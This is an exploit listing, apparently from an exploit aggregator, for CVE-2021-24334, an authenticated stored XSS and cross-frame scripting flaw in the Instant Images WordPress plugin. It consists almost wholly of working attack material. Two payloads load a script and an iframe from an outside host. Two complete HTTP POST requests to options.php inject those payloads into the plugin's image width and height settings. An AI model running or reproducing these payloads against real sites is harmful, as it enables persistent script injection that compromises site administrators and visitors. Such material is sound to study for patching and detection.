Exploit for Instant Images WordPress Plugin < 4.4.0.1 - Authenticated Stored XSS & XFS CVE-2021-24334

Name: Exploit for Instant Images WordPress Plugin < 4.4.0.1 - Authenticated Stored XSS & XFS CVE-2021-24334
Rating: 5 (269 reviews)

2021-05-17 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:AE79189A-6B63-4110-9567-CD7C97D71E4F
### -- [ Payloads: ]

[$] "><script src=//m0ze.ru/payload/a.js></script><div x

[$] "><iframe src=https://m0ze.ru/payload/xfsii.html></iframe><div x



### -- [ PoC #1 | Authenticated Persistent XSS & XFS | Max Image Upload Width: ]

[!] POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 361

option_page=instant-img-setting-group&action=update&_wpnonce=84d90e991d&_wp_http_referer=%2Fwp-admin%2Fupload.php%3Fpage%3Dinstant-images&instant_img_settings%5Bunsplash_download_w%5D=%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&instant_img_settings%5Bunsplash_download_h%5D=1337&instant_img_settings%5Bmedia_modal_display%5D=0



### -- [ PoC #2 | Authenticated Persistent XSS & XFS | Max Image Upload Height: ]

[!] POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 375

option_page=instant-img-setting-group&action=update&_wpnonce=84d90e991d&_wp_http_referer=%2Fwp-admin%2Fupload.php%3Fpage%3Dinstant-images&instant_img_settings%5Bunsplash_download_w%5D=1337&instant_img_settings%5Bunsplash_download_h%5D=%22%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E%3Cdiv+x&instant_img_settings%5Bmedia_modal_display%5D=0